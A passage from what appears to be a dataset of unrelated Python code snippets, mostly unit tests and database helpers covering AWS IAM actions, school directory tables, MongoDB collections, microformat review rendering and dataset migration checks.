= [\n \"datasync:UpdateLocationNfs\",\n \"datasync:UpdateLocationObjectStorage\",\n \"datasync:UpdateLocationSmb\",\n \"datasync:UpdateTaskExecution\"\n ]\n for action in actions:\n self.assertTrue(action in results)\n\n # Account Management\n results = get_actions_for_service(\"account\")\n actions = [\n \"account:DeleteAlternateContact\",\n \"account:GetAlternateContact\",\n \"account:PutAlternateContact\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n\n # AWS IAM Access Analyzer\n results = get_actions_for_service(\"access-analyzer\")\n actions = [\n \"access-analyzer:CancelPolicyGeneration\",\n \"access-analyzer:CreateAccessPreview\",\n \"access-analyzer:GetAccessPreview\",\n \"access-analyzer:GetGeneratedPolicy\",\n \"access-analyzer:ListAccessPreviewFindings\",\n \"access-analyzer:ListAccessPreviews\",\n \"access-analyzer:ListPolicyGenerations\",\n \"access-analyzer:StartPolicyGeneration\",\n \"access-analyzer:ValidatePolicy\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n # Elemental Activations\n results = get_actions_for_service(\"elemental-activations\")\n actions = [\n \"elemental-activations:CompleteAccountRegistration\",\n \"elemental-activations:StartAccountRegistration\"\n ]\n for action in actions:\n self.assertTrue(action in results)\n # OpenSearch\n results = get_actions_for_service(\"es\")\n actions = [\n \"es:DescribeDomainChangeProgress\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n # Location\n results = get_actions_for_service(\"geo\")\n actions = [\n \"geo:CalculateRouteMatrix\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n\n # Amazon Managed Grafana\n results = get_actions_for_service(\"grafana\")\n actions = [\n \"grafana:DescribeWorkspaceAuthentication\",\n \"grafana:UpdateWorkspaceAuthentication\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n\n # EC2 Image Builder\n results = get_actions_for_service(\"imagebuilder\")\n actions = [\n \"imagebuilder:ImportVmImage\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n # Timestream\n results = get_actions_for_service(\"timestream\")\n actions = [\n \"timestream:CreateScheduledQuery\",\n \"timestream:DeleteScheduledQuery\",\n \"timestream:DescribeScheduledQuery\",\n \"timestream:ExecuteScheduledQuery\",\n \"timestream:ListScheduledQueries\",\n \"timestream:UpdateScheduledQuery\",\n ]\n for action in actions:\n self.assertTrue(action in results)\n\n # AWS Transfer Family\n results = get_actions_for_service(\"transfer\")\n actions = [\n \"transfer:CreateAccess\",\n \"transfer:CreateWorkflow\",\n \"transfer:DeleteAccess\",\n \"transfer:DeleteWorkflow\",\n \"transfer:DescribeAccess\",\n \"transfer:DescribeExecution\",\n \"transfer:DescribeWorkflow\",\n \"transfer:ListAccesses\",\n \"transfer:ListExecutions\",\n \"transfer:ListWorkflows\",\n \"transfer:SendWorkflowStepState\",\n \"transfer:UpdateAccess\",\n ]\n for action in actions:\n self.assertTrue(action in results)", "def test_find_2018_cais_name_table33():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 33\n\n found_in_table_33, expected_in_table_33 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_33 == expected_in_table_33", "def run_check_attribute_types(db,col,elimit,verbose):\n # Although the function allows it this program won't support\n # a query for now because it would get ugly with different \n # definitions for each collection listed. Verbose is \n # also always off. Note the solution to enter one from \n # an input is to use json.loads\n errs=db._check_attribute_types(col,error_limit=elimit)\n mismatch=errs[0]\n undef=errs[1]\n print('check_attribute_types result for collection=',col)\n if verbose: \n if len(mismatch)==0:\n print('Collection has no type inconsistencies with schema')\n else:\n print('//////Collection=',col,' has type inconsistencies in ',\n len(mismatch),' documents////')\n print('///The following have types that do not match schema////')\n print_id_keyed_dict(mismatch)\n if len(undef)==0:\n print('Collection has no data with keys not defined in schema')\n else:\n print('//////Collection=',col,' has unrecogized keys in ',\n len(undef),' documents/////')\n print('////The following are offending data with doc ids///')\n print_id_keyed_dict(undef)\n else:\n if len(mismatch)==0:\n print('Collection has no type inconsistencies with schema')\n else:\n mmkeys=dict()\n for k in mismatch:\n badkeys=mismatch[k]\n for bad in badkeys:\n if bad in mmkeys:\n n=mmkeys[bad]\n n+=1\n mmkeys[bad]=n\n else:\n mmkeys[bad]=1\n print('Collection found ',len(mismatch),\n ' documents with type inconsistencies')\n print('Offending keys and number found follow:')\n print(json_util.dumps(mmkeys,indent=2))\n #Same for undef with minor differences in what is printed\n # maybe should make this a function\n if len(undef)==0:\n print('Collection has no type inconsistencies with schema')\n else:\n mmkeys=dict()\n for k in undef:\n badkeys=undef[k]\n for bad in badkeys:\n if bad in mmkeys:\n n=mmkeys[bad]\n n+=1\n mmkeys[bad]=n\n else:\n mmkeys[bad]=1\n print('Collection found ',len(undef),\n ' documents with keys not defined in the schema')\n print('Offending keys and number found follow:')\n print(json_util.dumps(mmkeys,indent=2))", "def check_consistency(self, es):", "def test_success(database):\n\n det_award_1 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"00FORGN\",\n place_of_perform_country_c=\"UKR\", record_type=1)\n det_award_2 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"00FoRGN\",\n place_of_perform_country_c=\"uKr\", record_type=1)\n det_award_3 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"ny**987\",\n place_of_perform_country_c=\"USA\", record_type=2)\n det_award_4 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"NY**987\",\n place_of_perform_country_c=\"UsA\", record_type=2)\n det_award_5 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"NY**987\",\n place_of_perform_country_c=\"UKR\", record_type=3)\n errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])\n assert errors == 0", "def database_setup():\n client = MongoClient('localhost', 27017)\n db = client[\"test_project\"]\n col1 = db['summary']\n keys = open('stems.txt', 'r').read().split('\\n')\n col1.insert({\"_id\": \"_hashmap\",\n \"Total_urls\": 1,\n \"mapping\": {'http://www;pec;ac;in': 0}})\n # setting up summary2 in db\n col2 = db['summary2']\n col2.insert({\"_id\": \"_hashmap\",\n \"Total_urls\": 1,\n \"mapping\": {'http://www;pec;ac;in': 0}})\n for word in keys:\n db.on_page_summary.insert(\n {\"_id\": word + \"_title\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_meta\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_header\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_table\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_html\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_cur_a\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_a\", \"posting\": []})\n db.on_page_summary.insert(\n {\"_id\": word + \"_page\", \"posting\": []})\n col1.insert({\"_id\": word, \"df\": 0, \"postings\": []})\n col2.insert({\"_id\": word, \"df\": 0, \"postings\": []})\n client.close()", "def test_find_2018_cais_name_table36():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 36\n\n found_in_table_36, expected_in_table_36 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_36 == expected_in_table_36", "def test_find_2018_cais_name_table34():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 34\n\n found_in_table_34, expected_in_table_34 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_34 == expected_in_table_34", "def test_find_2018_cais_name_table12():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 12\n\n found_in_table_12, expected_in_table_12 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_12 == expected_in_table_12", "def test_find_2018_cais_name_table37():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 37\n\n found_in_table_37, expected_in_table_37 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_37 == expected_in_table_37", "def test_figure3(self):\n\n ssearcher = SimpleSearcher.from_prebuilt_index('msmarco-passage')\n encoder = TctColBertQueryEncoder('castorini/tct_colbert-msmarco')\n dsearcher = SimpleDenseSearcher.from_prebuilt_index('msmarco-passage-tct_colbert-hnsw', encoder)\n hsearcher = HybridSearcher(dsearcher, ssearcher)\n\n hits = hsearcher.search('what is a lobster roll')\n\n self.assertAlmostEqual(hits[0].score, 71.56023, delta=0.0001)\n self.assertEqual(hits[0].docid, '7157715')\n\n self.assertAlmostEqual(hits[9].score, 70.07635, delta=0.0001)\n self.assertEqual(hits[9].docid, '7157708')\n\n self.assertEqual(len(hits), 10)", "def test_2():\n results = base_tests()\n correct = {\n \"Consequence\": \"synonymous_variant\",\n \"Codons\": \"tgC/tgT\",\n \"Amino_acids\": \"C\",\n \"Gene\": \"ENSG00000130164\",\n \"SYMBOL\": \"LDLR\",\n \"Feature\": \"ENST00000558013\",\n \"EXON\": \"2/18\",\n \"PolyPhen\": \"\",\n \"SIFT\": \"\",\n \"Protein_position\": \"27/858\",\n 'BIOTYPE\"': \"protein_coding\",\n }\n assert results[0] == correct", "def test_success(database):\n\n det_award_1 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"00FORGN\",\n place_of_perform_country_c=\"UKR\")\n det_award_2 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"00FoRGN\",\n place_of_perform_country_c=\"uKr\")\n det_award_3 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"ny**987\",\n place_of_perform_country_c=\"USA\")\n det_award_4 = DetachedAwardFinancialAssistanceFactory(place_of_performance_code=\"NY**987\",\n place_of_perform_country_c=\"UsA\")\n errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4])\n assert errors == 0", "def test_text_classifier_vaporise(self):\n pass", "def test_readSongData():\n\n # make sure the number of columns pull out from the database is correct\n assert svd.song_df.shape[1] == 8", "def check_data():\n check_docs(\"Training\")\n check_docs(\"dev\")\n check_docs(\"Test\")", "def test_ccds(self):\n #TODO write ccds tests", "def test_find_2018_cais_name_table27():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 27\n\n found_in_table_27, expected_in_table_27 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_27 == expected_in_table_27", "def test_index_has_status_in_title(self):", "def test_check_cds_10(self):\n self.cds1.translation_table = 1\n import_genome.check_cds(self.cds1, self.eval_flags)\n count = count_status(self.cds1, \"error\", \"warning\")\n self.assertEqual(count, 1)", "def test_hreview(self):\n rev1 = microformats.models.hReview()\n rev1.summary=\"Acme's new services rock!\"\n rev1.type='business'\n rev1.description='Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.'\n rev1.rating=4\n rev1.dtreviewed=datetime.datetime(2009,4,10)\n rev1.reviewer='John Smith'\n rev1.fn='Acme Corp'\n rev1.url='http://acme.com'\n rev1.tel='+44(0)1234 567456'\n rev1.street_address = '5445 N. 27th Street'\n rev1.extended_address = ''\n rev1.locality = 'Milwaukee'\n rev1.region = 'WI'\n rev1.country_name = 'US'\n rev1.postal_code = '53209'\n rev1.save()\n rev2 = microformats.models.hReview()\n rev2.summary = 'A phenomenal tuba recital'\n rev2.description = 'Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.'\n rev2.rating=5\n rev2.type='event'\n rev2.reviewer='John Doe'\n rev2.fn='John Fletcher - One man and his Tuba'\n rev2.url='http://www.johnfletcher-tuba.co.uk/'\n rev2.dtstart = datetime.datetime(1987, 10, 3, 19, 30)\n rev2.street_address = 'The Pro Arte Theatre'\n rev2.locality = 'London'\n rev2.save()\n rev3 = microformats.models.hReview()\n rev3.summary = 'Latest Star-Wars is Sucko-Barfo'\n rev3.description = 'Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam littera gothica, quam nunc putamus parum claram, anteposuerit litterarum formas humanitatis per seacula quarta decima et quinta decima. Eodem modo typi, qui nunc nobis videntur parum clari, fiant sollemnes in futurum.'\n rev3.rating=1\n rev3.type='film'\n rev3.reviewer='Barry Norman'\n rev3.fn='Star Wars - Revenge of the Sith'\n rev3.url='http://www.starwars.com/movies/episode-iii/'\n rev3.save()\n # Test for a review concerning something represented by an hCard\n result = hreview(rev1, autoescape=True) \n expected = u'\\n<div class=\"hreview\">\\n <strong class=\"summary\">Acme&#39;s new services rock!</strong>\\n <abbr class=\"type\" title=\"business\"> Business</abbr> Review\\n <br/>\\n \\n <abbr title=\"\" class=\"dtreviewed\">Fri 10 Apr 2009</abbr>\\n \\n by\\n <span class=\"reviewer vcard\"><span class=\"fn\">John Smith</span></span>\\n \\n \\n <div class=\"item vcard\">\\n \\n <a class=\"url fn org\" href=\"http://acme.com\">\\n \\n Acme Corp\\n \\n </a>\\n \\n <div class=\"tel\">+44(0)1234 567456</div>\\n \\n \\n<div class=\"adr\">\\n <div class=\"street-address\">5445 N. 27th Street</div>\\n \\n <span class=\"locality\">Milwaukee</span>&nbsp;\\n <span class=\"region\">WI</span>&nbsp;\\n <span class=\"postal-code\">53209</span>&nbsp;\\n <span class=\"country-name\">United States</span>\\n</div>\\n\\n \\n </div>\\n \\n \\n \\n \\n \\n \\n <abbr class=\"rating\" title=\"4\">\\u2605\\u2605\\u2605\\u2605\\u2606</abbr>\\n \\n \\n \\n <blockquote class=\"description\">\\n Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.\\n </blockquote>\\n \\n</div>\\n'\n self.assertEquals(expected, result)\n # Test for a review concerning something represented by an hCalendar\n result = hreview(rev2, autoescape=True) \n expected = u'\\n<div class=\"hreview\">\\n <strong class=\"summary\">A phenomenal tuba recital</strong>\\n <abbr class=\"type\" title=\"event\"> Event</abbr> Review\\n <br/>\\n \\n by\\n <span class=\"reviewer vcard\"><span class=\"fn\">John Doe</span></span>\\n \\n <div class =\"item vevent\">\\n <a href=\"http://www.johnfletcher-tuba.co.uk/\" class=\"url\">\\n \\n <abbr title=\"1987-10-03T19:30:00\" class=\"dtstart\">Sat 03 Oct 1987 7:30 p.m.</abbr>\\n \\n \\n </a> -\\n <span class=\"summary\">John Fletcher - One man and his Tuba</span>\\n \\n \\n<div class=\"adr\">\\n <div class=\"street-address\">The Pro Arte Theatre</div>\\n \\n <span class=\"locality\">London</span>&nbsp;\\n \\n \\n \\n</div>\\n\\n \\n </div>\\n \\n \\n \\n \\n \\n \\n <abbr class=\"rating\" title=\"5\">\\u2605\\u2605\\u2605\\u2605\\u2605</abbr>\\n \\n \\n <blockquote class=\"description\">\\n Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.\\n </blockquote>\\n \\n</div>\\n'\n self.assertEquals(expected, result)\n # Test for a review about anything else\n result = hreview(rev3, autoescape=True) \n expected = u'\\n<div class=\"hreview\">\\n <strong class=\"summary\">Latest Star-Wars is Sucko-Barfo</strong>\\n <abbr class=\"type\" title=\"film\"> Film</abbr> Review\\n <br/>\\n \\n by\\n <span class=\"reviewer vcard\"><span class=\"fn\">Barry Norman</span></span>\\n \\n \\n \\n <div class=\"item\">\\n \\n <a class=\"url fn\" href=\"http://www.starwars.com/movies/episode-iii/\">\\n \\n Star Wars - Revenge of the Sith\\n \\n </a>\\n \\n </div>\\n \\n \\n \\n \\n <abbr class=\"rating\" title=\"1\">\\u2605\\u2606\\u2606\\u2606\\u2606</abbr>\\n \\n \\n \\n \\n \\n \\n <blockquote class=\"description\">\\n Claritas est etiam processus dynamicus, qui sequitur mutationem consuetudium lectorum. Mirum est notare quam littera gothica, quam nunc putamus parum claram, anteposuerit litterarum formas humanitatis per seacula quarta decima et quinta decima. Eodem modo typi, qui nunc nobis videntur parum clari, fiant sollemnes in futurum.\\n </blockquote>\\n \\n</div>\\n'\n self.assertEquals(expected, result)\n # Test for minimal review\n rev3.summary = ''\n rev3.description = ''\n rev3.rating = 1\n rev3.type = 'film'\n rev3.reviewer = 'Barry Norman'\n rev3.fn = 'Star Wars - Revenge of the Sith'\n rev3.url = ''\n result = hreview(rev3, autoescape=True) \n expected = u'\\n<div class=\"hreview\">\\n \\n <abbr class=\"type\" title=\"film\"> Film</abbr> Review\\n <br/>\\n \\n by\\n <span class=\"reviewer vcard\"><span class=\"fn\">Barry Norman</span></span>\\n \\n \\n \\n <div class=\"item\">\\n \\n <span class=\"fn\">\\n \\n Star Wars - Revenge of the Sith\\n \\n </span>\\n \\n </div>\\n \\n \\n \\n \\n <abbr class=\"rating\" title=\"1\">\\u2605\\u2606\\u2606\\u2606\\u2606</abbr>\\n \\n \\n \\n \\n \\n \\n</div>\\n'\n self.assertEquals(expected, result)", "def test_from_spotdb(spotdb_data):\n\n db = spotdb_data\n runs = db.get_all_run_ids()\n gfs = GraphFrame.from_spotdb(spotdb_data, runs[0:2])\n\n assert len(gfs) == 2\n\n metrics = {\"Total time (inc)\", \"Avg time/rank (inc)\"}\n\n assert len(gfs[0].dataframe) > 2\n assert gfs[0].default_metric == \"Total time (inc)\"\n assert metrics < set(gfs[0].dataframe.columns)\n\n assert \"launchdate\" in gfs[0].metadata.keys()", "def test_catalogd_ha_with_two_catalogd(self):\n # Verify two catalogd instances are created with one as active.\n catalogds = self.cluster.catalogds()\n assert(len(catalogds) == 2)\n catalogd_service_1 = catalogds[0].service\n catalogd_service_2 = catalogds[1].service\n assert(catalogd_service_1.get_metric_value(\"catalog-server.active-status\"))\n assert(not catalogd_service_2.get_metric_value(\"catalog-server.active-status\"))\n\n # Verify ports of the active catalogd of statestore and impalad are matching with\n # the catalog service port of the current active catalogd.\n self.__verify_statestore_active_catalogd_port(catalogd_service_1)\n self.__verify_impalad_active_catalogd_port(0, catalogd_service_1)\n self.__verify_impalad_active_catalogd_port(1, catalogd_service_1)\n self.__verify_impalad_active_catalogd_port(2, catalogd_service_1)\n # Verify simple queries are ran successfully.\n self.__run_simple_queries()\n # Verify simple queries with sync_ddl as 1.\n self.__run_simple_queries(sync_ddl=True)\n\n # Restart one coordinator. Verify it get active catalogd address from statestore.\n self.cluster.impalads[0].restart()\n self.cluster.impalads[0].service.wait_for_metric_value('impala-server.ready',\n expected_value=1, timeout=30)\n self.__verify_impalad_active_catalogd_port(0, catalogd_service_1)", "def classify_result(doc_rslts, _schema):\n return schema.assign_schema(doc_rslts, _schema)", "def main():\n\n for cow in mongo.cows():\n type_ = TYPES['identity']\n label = LABELS['prods']\n parents = []\n settings = {'cow': cow}\n\n if mongo.is_analysis(type_, label, parents, settings):\n print('The document must be unique: {}'.format(cow))\n else:\n mongo.db.analysis.insert_one({\n 'type': type_,\n 'label': label,\n 'parents': parents,\n 'settings': settings,\n 'data': mongo.prods(cow),\n })", "def test_find_2018_cais_name_table31():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 31\n\n found_in_table_31, expected_in_table_31 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_31 == expected_in_table_31", "def test_database(self):\n review = Review(project=self.new_project, user=self.new_user, design=7, usability=6, content=5, comment=\"This is a nice website.\")\n review.save()\n reviews = Review.objects.all()\n\n self.assertTrue(len(reviews) > 0)", "def test_create_subject_access_review_for_all_namespaces(self):\n pass", "def _google_data_test(self):\r\n res = Bmark.query.all()\r\n self.assertEqual(\r\n len(res),\r\n 9,\r\n \"We should have 9 results, we got: \" + str(len(res)))\r\n\r\n # verify we can find a bookmark by url and check tags, etc\r\n check_url = 'http://www.alistapart.com/'\r\n check_url_hashed = generate_hash(check_url)\r\n found = Bmark.query.filter(Bmark.hash_id == check_url_hashed).one()\r\n\r\n self.assertTrue(\r\n found.hashed.url == check_url, \"The url should match our search\")\r\n self.assertEqual(\r\n len(found.tags),\r\n 4,\r\n \"We should have gotten 4 tags, got: \" + str(len(found.tags)))\r\n\r\n # and check we have a right tag or two\r\n self.assertTrue(\r\n 'html' in found.tag_string(),\r\n 'html should be a valid tag in the bookmark')\r\n\r\n # and check the long description field\r\n self.assertTrue(\r\n \"make websites\" in found.extended,\r\n \"'make websites' should be in the extended description\")", "def test_find_2018_cais_name_table30():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 30\n\n found_in_table_30, expected_in_table_30 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_30 == expected_in_table_30", "def test_create_resource_access_review_for_all_namespaces(self):\n pass", "def test_text_classifier_test(self):\n pass", "def test_find_2018_cais_name_table28():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 28\n\n found_in_table_28, expected_in_table_28 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_28 == expected_in_table_28", "def test_success(database):\n\n det_award_1 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=\"description\",\n place_of_perform_country_c=\"UK\",\n record_type=2)\n det_award_2 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=\"description\",\n place_of_perform_country_c=\"USA\",\n record_type=2\n )\n det_award_3 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=None,\n place_of_perform_country_c=\"USA\",\n record_type=2)\n det_award_4 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=\"\",\n place_of_perform_country_c=\"UsA\",\n record_type=2)\n det_award_5 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=\"\",\n place_of_perform_country_c=\"UK\",\n record_type=1)\n det_award_6 = DetachedAwardFinancialAssistanceFactory(place_of_performance_forei=None,\n place_of_perform_country_c=\"UK\",\n record_type=1)\n\n errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4,\n det_award_5, det_award_6])\n assert errors == 0", "def setUp(self):\n # Create domain tables required for the test\n super().setUp()\n\n # Load the test data\n condition_occurrence_data_template = self.jinja_env.from_string(\"\"\"\n CREATE OR REPLACE TABLE `{{project_id}}.{{dataset_id}}.condition_occurrence`\n (\n condition_occurrence_id int64, \n person_id int64, \n condition_concept_id int64, \n stop_reason STRING,\n condition_source_value STRING,\n condition_status_source_value STRING)\n AS (\n WITH w AS (\n SELECT ARRAY<STRUCT<\n condition_occurrence_id int64, \n person_id int64, \n condition_concept_id int64, \n stop_reason STRING,\n condition_source_value STRING,\n condition_status_source_value STRING\n >>\n [(1, 1, 0, 'stop reason', 'source value', 'status'),\n (2, 1, 0, 'stop reason', 'source value', 'status'),\n (3, 1, 0, 'stop reason', 'source value', 'status'),\n (4, 1, 0, 'stop reason', 'source value', 'status')] col\n )\n SELECT \n condition_occurrence_id, \n person_id, \n condition_concept_id, \n stop_reason,\n condition_source_value,\n condition_status_source_value \n FROM w, UNNEST(w.col))\n \"\"\")\n\n # Load the test data\n observation_data_template = self.jinja_env.from_string(\"\"\"\n CREATE OR REPLACE TABLE `{{project_id}}.{{dataset_id}}.observation`\n (\n observation_id int64,\n person_id int64,\n observation_concept_id int64,\n observation_source_concept_id int64,\n value_as_string STRING,\n observation_source_value STRING,\n unit_source_value STRING,\n qualifier_source_value STRING,\n value_source_value STRING\n )\n AS (\n -- 1585250 corresponds to the zipcode concept that is not subject to string suppression, value_as_string for this record should be kept --\n WITH w AS (\n SELECT ARRAY<STRUCT<\n observation_id int64, \n person_id int64, \n observation_concept_id int64,\n observation_source_concept_id int64,\n value_as_string STRING, \n observation_source_value STRING,\n unit_source_value STRING,\n qualifier_source_value STRING,\n value_source_value STRING\n >>\n [(1, 1, 0, 1585250, '111111', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value'),\n (2, 1, 0, 0, 'value_as_string', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value'),\n (3, 1, 0, 0, 'value_as_string', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value'),\n (4, 1, 0, 0, 'value_as_string', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value'),\n (5, 1, 0, 0, 'value_as_string', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value'),\n (6, 1, 0, 715711, 'foo_date', 'observation_source_value', 'unit_source_value', 'qualifier_source_value', 'value_source_value')] col\n )\n SELECT \n observation_id,\n person_id,\n observation_concept_id,\n observation_source_concept_id,\n value_as_string, \n observation_source_value,\n unit_source_value,\n qualifier_source_value,\n value_source_value \n FROM w, UNNEST(w.col))\n \"\"\")\n\n insert_condition_query = condition_occurrence_data_template.render(\n project_id=self.project_id, dataset_id=self.dataset_id)\n\n insert_observation_query = observation_data_template.render(\n project_id=self.project_id, dataset_id=self.dataset_id)\n\n # Load test data\n self.load_test_data([\n f'''{insert_condition_query};\n {insert_observation_query};'''\n ])", "def test_find_2018_cais_name_table29():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 29\n\n found_in_table_29, expected_in_table_29 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_29 == expected_in_table_29", "def test12(self):\n ###get a dataset to migrate from global dbs\n dest_datasets = set((dataset['dataset'] for dataset in self.api.listDatasets()))\n ###only dataset after last DBS2->3 because of the parentage issue in DBS 2 min_cdate=1368162000 =10May2013\n src_datasets = set((dataset['dataset'] for dataset in self.cmsweb_api.listDatasets(min_cdate=1368162000)))\n dataset_to_migrate = choice(list(src_datasets.difference(dest_datasets)))\n\n ###submit migration request\n toMigrate = {'migration_url': self.source_url,\n 'migration_input': dataset_to_migrate}\n migration_request = self.migration_api.submitMigration(toMigrate)\n self.assertTrue('migration_request_id' in migration_request['migration_details'])\n migration_request_id = migration_request['migration_details']['migration_request_id']\n print(\"____toMigrate___\")\n print(toMigrate)\n print(\"----------migration_request -----------\")\n print(migration_request)\n ###check migration status for max. 300s (should be enough time to migrate the dataset)\n with Timeout(300):\n while True:\n request_status = self.migration_api.statusMigration(migration_rqst_id=migration_request_id)\n if request_status[0]['migration_status'] == 2:\n break\n\n ###validate dataset migration\n def check(input, output):\n non_comparable_keys = ('block_id', 'dataset_id', 'last_modification_date',\n 'parent_file_id', 'primary_ds_id')\n if isinstance(input, dict):\n for key, value in input.items():\n if key in non_comparable_keys:\n continue ###do not compare id's\n if key in ('processing_era',): ###do compare create_by, creation_date for re-used entries\n for key2remove in ('create_by', 'creation_date',):\n try:\n del input[key][key2remove]\n del output[key][key2remove]\n except KeyError:\n pass\n self.assertTrue(key in output)\n check(value, output[key])\n elif isinstance(input, list):\n for element_in, element_out in zip(sorted(remove_non_comparable_keys(input, non_comparable_keys)),\n sorted(remove_non_comparable_keys(output, non_comparable_keys))):\n check(element_in, element_out)\n else:\n self.assertEqual(str(input), str(output))\n\n for block_name in (block['block_name'] for block in self.cmsweb_api.listBlocks(dataset=dataset_to_migrate)):\n block_dump_src = self.cmsweb_api.blockDump(block_name=block_name)\n block_dump_dest = self.api.blockDump(block_name=block_name)\n check(block_dump_src, block_dump_dest)\n\n ###try to delete successfully executed migration request\n toDelete = {'migration_rqst_id': migration_request_id}\n self.assertRaises(HTTPError, self.migration_api.removeMigration, toDelete)", "def test_find_2018_cais_name_table18():\n test_file = \"School_Directory_2018-2019-converted.xlsx\"\n results_file = \"cais_name_counts_manual_2018-2019.xlsx\"\n table_num = 18\n\n found_in_table_18, expected_in_table_18 = common_search(test_file, results_file, table_num)\n\n assert found_in_table_18 == expected_in_table_18", "def complete_databank(port=\"localhost:27017\",coconut_database=\"COCONUT2020-10\",sweetcoconut_database=\"sweetcoconut\"):\n client = MongoClient(port)\n db_complete = client[coconut_database]\n collection = db_complete.uniqueNaturalProduct\n db_complete_only_ring_sugars = pd.DataFrame(list(collection.find({\"contains_ring_sugars\": True})))\n df_complete_tax = pd.DataFrame({\"taxonomy\": db_complete_only_ring_sugars[\"textTaxa\"],\n \"smiles\": db_complete_only_ring_sugars[\"smiles\"],\n \"coconut_id\": db_complete_only_ring_sugars[\"coconut_id\"],\n \"no_sugar_smiles\": db_complete_only_ring_sugars[\"sugar_free_smiles\"]\n })\n complete_names = []\n indexes = []\n for i in range(len(df_complete_tax.taxonomy)):\n # some entries are empty lists\n # doubles\n if df_complete_tax.taxonomy[i] != [] and (\"plants\" in df_complete_tax.taxonomy[i] or \"bacteria\" in df_complete_tax.taxonomy[i] or \"marine\" in df_complete_tax.taxonomy[i] or \"animals\" in df_complete_tax.taxonomy[i] or \"fungi\" in df_complete_tax.taxonomy[i]):\n indexes.append(i)\n complete_names.append(df_complete_tax.taxonomy[i])\n df_five_tax = df_complete_tax.loc[indexes[:]]\n df_tax_id = pd.DataFrame({\"taxonomy\": df_five_tax.taxonomy,\n \"coconut_id\": df_five_tax.coconut_id})\n df_tax_id = df_tax_id.reset_index()\n taxonomies = [\"plants\",\"bacteria\",\"fungi\",\"marine\",\"animals\"]\n biology_names = []\n for row in 